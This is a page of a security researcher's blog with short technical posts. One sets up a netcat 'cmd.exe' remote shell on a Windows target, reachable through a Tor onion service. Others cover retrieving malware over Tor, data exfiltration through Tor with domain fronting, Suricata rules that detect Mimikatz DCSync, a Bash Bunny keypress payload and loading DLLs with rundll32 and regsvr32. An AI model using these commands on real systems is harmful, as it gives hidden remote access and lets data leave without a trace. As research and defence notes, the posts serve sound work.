Didier Stevens

Monday 5 February 2018

Quickpost: Remote Shell On Windows Via Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Creating a Tor onion service (aka hidden service) on a Windows Tor client.

I download the Tor expert bundle (this works with the Tor Browser too).

I create Tor configuration file torrc with these lines:

HiddenServiceDir C:\demo\Tor\service
HiddenServicePort 8662 127.0.0.1:12345

When Tor is started, folder C:\demo\Tor\Service will be created and populated with a couple of files (file hostname contains the .onion address created by Tor for this onion service).

The onion service will be listening on port 8662, and traffic will be forwarded to 127.0.0.1 port 12345.

It is possible to enable client authorization for this service (without client authorization, everybody who knows the .onion address and the port can connect to it). Basic client authorization uses a shared secret, and is configured with this line (torrc):

HiddenServiceAuthorizeClient basic testuser

I choose testuser as name for the client.

I start Tor with configuration file torrc like this: tor.exe -f torrc

The .onion address and client authorization cookie can be found in file hostname in the service folder:

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

Keep the authorization cookie secret of course, I show it here for the demo.

Now start the service on the target Windows machine with nc.exe (I downloaded nc.exe years ago, I don’t have the original URL anymore, my version is 1.11 with MD5 ab41b1e2db77cebd9e2779110ee3915d):

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor expert bundle and nc.exe have no extra dependencies (like DLLs), and can be executed as normal user.

Now the target machine is ready.

On another machine, I start Tor with a configuration file containing the authorization cookie:

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

And then I run ncat, because ncat.exe supports socks5 proxies (nc.exe doesn’t):

ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662

This gives me a remote shell:

Remark that this does not work with version 7.60, apparently because of a regression bug:

libnsock select_loop(): nsock_loop error 10038: An operation was attempted on something that is not a socket.

 


Quickpost info


Saturday 3 February 2018

Quickpost: Code To Connect To Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 20:16

I wanted a program to connect to Tor Onion Services (aka hidden services). It’s written in Python and uses the PySocks module:


import socks

PROXYHOST = 'localhost'
PROXYPORT = 9050

HOST = 'duskgytldkxiuqc6.onion'
PORT = 80

print('[*] Creating socket')
oSocket = socks.socksocket()

print('[*] Setting SOCKS5 proxy %s %s' % (PROXYHOST, PROXYPORT))
oSocket.set_proxy(socks.SOCKS5, PROXYHOST, PROXYPORT)

print('[*] Connecting %s %s' % (HOST, PORT))
oSocket.connect((HOST, PORT))

print('[*] Sending')
data = ['GET / HTTP/1.1', 'Host: %s' % HOST]
data = '\r\n'.join(data) + '\r\n\r\n'
print(data)
oSocket.sendall(data.encode('ascii'))

print('[*] Receiving')
print(oSocket.recv(0x1000))

print('[*] Closing')
oSocket.close()

print('[*] Done')

In line 13 I configure the socksocket to use Tor as a SOCKS5 proxy (Tor needs to be running).

From that line on, the code is the same as for the build-in socket module:


import socket

...
print('[*] Creating socket')
oSocket = socket.socket()

...

In this first example I build an HTTP GET request, that is something that doesn’t have to be done when module requests is used:


import requests

PROXYHOST = 'localhost'
PROXYPORT = 9050

HOST = 'duskgytldkxiuqc6.onion'

url = 'http://' + HOST
print('[*] Requesting %s' % url)
print(requests.get(url, proxies={'http': 'socks5h://%s:%s' % (PROXYHOST, PROXYPORT), 'https': 'socks5h://%s:%s' % (PROXYHOST, PROXYPORT)}).text)

print('[*] Done')


Quickpost info


Sunday 21 January 2018

Quickpost: Retrieving Malware Via Tor On Windows

Filed under: Malware,Quickpost — Didier Stevens @ 22:46

I sometimes retrieve malware over Tor, just as a simple trick to use another IP address than my own. I don’t do anything particular to be anonymous, just use Tor in its default configuration.

On Linux, its easy: I install tor and torsocks packages, then start tor, and use wget or curl with torsocks, like this:

torsocks wget URL

torsocks curl URL

On Windows, its a bit more difficult, because the torsocks trick doesn’t work.

I run Tor (Windows Expert Bundle) without any configuration:

This will give me a Socks listener, that curl can use:

curl --socks5-hostname 127.0.0.1:9050 http://www.didierstevens.com

option –socks5-hostname makes curl use the Socks listener provided by Tor to make connections and perform DNS requests (option –socks5 does not use the Socks listener for DNS request, just for connections).

wget has no option to use a Socks listener, but it can use an HTTP(S) proxy.

Privoxy is a filtering proxy that I can use to help wget to talk to Tor like this.

I make 2 changes to Privoxy’s configuration config.txt:

1) I change line 811 from “toggle 1” to “toggle 0” to configure Privoxy as a normal proxy, without filtering.

2) I add this line 1363: “forward-socks5t / 127.0.0.1:9050 .”, this makes Privoxy use Tor.

Then I launch Privoxy:

And then I can use wget like this:

wget -e use_proxy=yes -e http_proxy=127.0.0.1:8118 -e https_proxy=127.0.0.1:8118 URL

Port 8118 is Privoxy’s port. If you want, you can also put these options in a configuration file.

Often, my wget command will be a bit more complex (I’ll explain this in another blog post, but it’s based on this ISC diary entry):

wget -d -o 01.log -U "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" -e use_proxy=yes -e http_proxy=127.0.0.1:8118 -e https_proxy=127.0.0.1:8118 --no-check-certificate URL

 

I can also use Tor browser in stead of Tor, but then I need to connect to port 9150.


Quickpost info


Saturday 20 January 2018

Quickpost: Data Exfiltration With Tor Browser And Domain Fronting

Filed under: Quickpost — Didier Stevens @ 23:46

Some notes, mainly for myself.

Installing the Tor Browser on Windows can be done without administrative rights.

Start the Tor Browser and configure it:

Meek is a Tor pluggable transport for domain fronting, I select Amazon for domain fronting:

Tor Browser supports proxies:

Then I can connect to the Tor network with TLS via an Amazon server:

And then go to a web site to exfiltrate data:

In the packet capture, I just see DNS requests for a0.awsstatic.com followed by a TLS connection:

 


Quickpost info


Sunday 8 October 2017

Quickpost: Mimikatz DCSync Detection

Filed under: Hacking,Networking,Quickpost — Didier Stevens @ 22:40

Benjamin Delpy/@gentilkiwi’s Brucon workshop on Mimikatz inspired me to resume my work on detecting DCSync usage inside networks.

Here are 2 Suricata rules to detect Active Directory replication traffic between a domain controller and a domain member like a workstation (e.g. not a domain controller):


alert tcp !$DC_SERVERS any -> $DC_SERVERS any (msg:"Mimikatz DRSUAPI"; flow:established,to_server; content:"|05 00 0b|"; depth:3; content:"|35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2|"; depth:100; flowbits:set,drsuapi; flowbits:noalert; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000001; rev:1;)
alert tcp !$DC_SERVERS any -> $DC_SERVERS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; content:"|00 03|"; offset:22 depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000002; rev:1;)

Variable DC_SERVERS should be set to the IP addresses of the domain controllers.

The first rule will set a flowbit (drsuapi) when DCE/RPC traffic is detected to bind to the directory replication interface (DRSUAPI).

The second rule will detect a DCE/RPC DsGetNCChanges request if the flowbit drsuapi is set.

 

These rules were tested in a test environment with normal traffic between a workstation and a domain controller, and with Mimikatz DCSync traffic. They were not tested in a production network.


Quickpost info


Tuesday 19 September 2017

Quickpost: Creating A Simple Flow Graph With GNU Radio Companion

Filed under: Hardware,Quickpost — Didier Stevens @ 0:00

If you installed GNU Radio and want to know how to create the Flow Graph I used to test my SDR, follow along:

Start GNU Radio Companion, and create a new WX GUI file:

You will see 2 blocks, Options and Variable:

Notice that the ID is “top_block” (that’s the default), and that the Generate Options is “WX GUI” (QT GUI is the default).

Variable is a block that defines a variable for the sample rate: samp_rate. By default, it’s 32k (32000), but that’s too small.

For my RTL-SDR, I will use 2 MHz (2000000 Hz). Double click the Variable block, change the value and click OK:

Now we will add a block that represents our SDR as a source of data. Go to the right menu and select “RTL-SDR Source” (you can click the search button on the toolbar to search for this block).

Drag this block into the flow graph:

Notice that the title of this block is in red: that’s to indicate that there is an error with this block (it’s not connected). We will fix that soon.

Next select the “WX GUI Waterfall Sink” block:

Drag this block into the flow graph:

Hover with your mouse over the blue port of block “RTL-SDR Source”, the word “out” will appear:

Click on the blue port:

Now hover with your mouse over the blue port of block “WX GUI Waterfall Sink”, the word “in” will appear:

Click on the blue port:

An arrow connects the 2 ports, and the titles turn black (no errors).

The default frequency of block “RTL-SDR Source” is 100 MHz. I will tune this to a local FM radio station at 100.6 MHz. Double click the “RTL-SDR Source” block, and edit the Ch0 Frequency: 100.6e6 is 100600000 or 100.6 MHz (e6 is the exponent notation for 1000000, 6 zeroes).

We can now save the flow graph. A flow graph has to be saved before it can be executed, if it is not saved, GNU Radio Companion will display a save dialog box when you execute the flow graph.

The extension for flow graph files is .grc:

A .grc file is an XML file:

Now we can execute the flow graph by clicking on the Play button:

When everything works fine, you should see output like this:

The green bands represent the signals of broadcast stations, and in the terminal you can see that a top_block.py program was generated and executed, and that GNU Radio is able to connect to the SDR device and get data.

GNU Radio Companion creates the top_block.py program (the name comes from the ID in the Options block), and executes it with GNU Radio:

If GNU Radio is not able to get data from your SDR device, it will generate null values: the waterfall plot will be uniform blue, and the terminal will report errors:

You can stop the Python program from running by clicking the stop button:

If there are errors in your flow graph, you will not be able to click the play button. Click the error button to get more info:

 

 


Quickpost info


Monday 18 September 2017

Quickpost: GNU Radio On Windows

Filed under: Hardware,Quickpost — Didier Stevens @ 20:43

I’ve been using GNU Radio & GNU Radio Companion with the GNU Radio Live SDR Environment, but now I’ve switched to GNU Radio on Windows (I’ve seen posts that it’s stable now).

The installation was easy, I downloaded the GNURadio 3.7.11.1 x64 binaries and proceeded with a default install:

Next, install drivers for my HackRF One and RTL-SDR with Zadig.

Zadig can auto-update:

When I plug in my HackRF One, no driver is installed automatically (Windows 10), I use Zadig to install a WinUSB driver:

The same for my RTL-SDR, although the name of the device is “Bulk-In, Interface (Interface 0)”. A driver was automatically installed after connecting it (RTL2832UUSB), but I need WinUSB here too:

If you don’t see your device listed, make sure that all devices are listed:

Now I can use GNU Radio on my Windows machine. I start GNU Radio Companion, and get a one time warning about xterm missing, that I can ignore:

A quick flow graph connecting my RTL-SDR (tuned to a local FM station) to a waterfall plot shows my SDR is working (the terminal output confirms that too):

If GNU Radio is not receiving I/Q data from your SDR, the waterfall plot will be pure blue, and you will see a message attesting to that in the terminal.

 


Quickpost info


Sunday 17 September 2017

Quickpost: Update: Infinite Control For Bash Bunny

Filed under: Bash Bunny,Hardware,My Software,Quickpost,Update — Didier Stevens @ 16:39

This is an update to my Bash Bunny payload Infinite Control: it sends a CONTROL keypress every 10 seconds. I changed the LED colors, and if you uncomment line 27 the BREAK key will be used (function key 15, as some people suggested).

You can find it on HAK5’s GitHub Bash Bunny repository too.

#!/bin/bash
# Title:         Infinite Control
# Author:        Didier Stevens (https://DidierStevens.com)
# Version:       0.0.2 2017/09/02
# History:       0.0.1 2017/04/08 start
#                0.0.2 2017/09/02 changed LED colors, added BREAK
#
# Hit the CONTROL key every 10 seconds in an infinite loop,
# while blinking the CYAN LED with every keypress.
#
# Can be used to prevent a machine from sleeping or auto-locking.
#
# Some users have suggested to hit F15 (BREAK) in stead of CTRL.
# This can be done by uncommenting line #INFINITE_KEY=BREAK.
#
# WARNING: Do not type on the machine's keyboard while this script
#          is running, or your keystrokes might become commands,
#          for example CTRL-Q: Quit
#
# Cyan ..............Hitting CONTROL key
# Yellow Blinking ...Sleeping
# Red Blinking.......Wow! We broke out of the infinite while loop!

ATTACKMODE HID

INFINITE_KEY=CTRL
#INFINITE_KEY=BREAK

# infinite while loop
while true
do
	LED SPECIAL
	QUACK $INFINITE_KEY
	sleep 1
	LED ATTACK
	sleep 9
done

# this code will never be reached
LED FAIL

 


Quickpost info


Saturday 9 September 2017

Quickpost: Keyboard Setting For pfSense

Filed under: Quickpost — Didier Stevens @ 0:00

Here’s how I configured a belgian keyboard on pfSense: I added the command “kbdcontrol -l be.iso.kbd” to my profile (.profile):

Mappings for keyboards can be found in folder /usr/share/syscons/keymaps:

 

 


Quickpost info


Friday 8 September 2017

Quickpost: DllDemo

Filed under: Quickpost — Didier Stevens @ 0:00

This is a quick demo on loading DLLs with standard Windows tools.

I wrote a DLL for this demo:

#include <windows.h>

extern "C" __declspec(dllexport) void ExportedFunction(void)
{
	OutputDebugString("ExportedFunction");
	MessageBox(NULL, "Hello from ExportedFunction, DemoDll!", "DemoDll", MB_OK);;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
	switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		OutputDebugString("DLL_PROCESS_ATTACH");
		MessageBox(NULL, "Hello from DllMain, DemoDll!", "DemoDll", MB_OK);;
		break;

	case DLL_THREAD_ATTACH:
		OutputDebugString("DLL_THREAD_ATTACH");
		break;

	case DLL_THREAD_DETACH:
		OutputDebugString("DLL_THREAD_DETACH");
		break;

	case DLL_PROCESS_DETACH:
		OutputDebugString("DLL_PROCESS_DETACH");
		break;
	}

	return TRUE;
}

A message box is displayed when DllMain (the entrypoint for DLLs) is called when the DLL is loaded into a process, and another message box is displayed when function ExportedFunction is executed.

Function ExportedFunction is prefixed by __declspec(dllexport) to export the function, and with extern “C” to prevent C++ name mangling.

One method to load this DLL into a process, is to use the rundll32 command (since I’m doing this demo on Windows 10, I’m using the 64-bit version of my DLL):

No message box is displayed: the DLL was not loaded. The reason is that rundll32 requires you to specify an exported function that it needs to call.

With dumpbin, we can get an overview of the exported functions of a DLL:

We can specify the name of the exported function we want to call like this:

We can see the message box from the entrypoint, and then the message box from the exported function we called:

This means that the DLL was loaded into the rundll32 process, and that the called function was executed.

Exported functions have an ordinal too (a number to identify exported functions), and that number can be used too to specify the function, like this:

If we use rundll32 with a function that is not exported by the DLL, then the DLL is loaded:

rundll32 will display an error because it could not find the exported function:

But as we could see, the DLL got loaded.

Despite the name would make you think (rundll32), the version of rundll32 I used is a 64-bit executable, and that’s why I used a 64-bit DLL.

32-bit DLLs have to be loaded into 32-bit processses, and 64-bit DLLs into 64-bit processes.

However, rundll32 will start a “proxy” process if you mix bitness, so that DLLs will always be loaded.

Let’s look at the 4 possible combinations:

64-bit rundll32 with 32-bit DLL:

Taking a look with process explorer, we see that 64-bit rundll32 started 32-bit rundll32 to load the 32-bit DLL:

64-bit rundll32 with 64-bit DLL:

In this case, there is no need for a “proxy” process:

32-bit rundll32 with 32-bit DLL:

In this case too, there is no need for a “proxy” process:

And finally, 32-bit rundll32 with 64-bit DLL:

Here we see that 32-bit rundll32 started 64-bit rundll32 to load the 64-bit DLL:

The following is another method: rundll32 shell32.dll,Control_RunDLL C:\Demo\DemoDLL-64-bit.dll

You have to provide an absolute path.

Finally, another method to load a DLL is with regsvr32. I’ve started to use regsvr32 long ago, when I developed ActiveX object: you used it to deploy ActiveX objects on machines.

By default, regsvr32 will load the DLL and call exported function DllRegisterServer:

Since function DllRegisterServer is not exported by the demo DLL, we get an error:

But the DLL was loaded. If we export a function named DllRegisterServer in our DLL, it would get executed.

regsvr32 can be used to call other exported functions too (DllUnRegisterServer and DllInstall), as can be seen from the help dialog when you run regsvr32 without arguments:

DemoDll_V0_0_0_1.zip (https)
MD5: 51ED8255B71097269BFF9B5ADBFDC392
SHA256: 599BA297705B15580A297C3F47429225C38EA9FAA4A8DF27BCE49C918964AD30


Quickpost info


Next Page »

Blog at WordPress.com.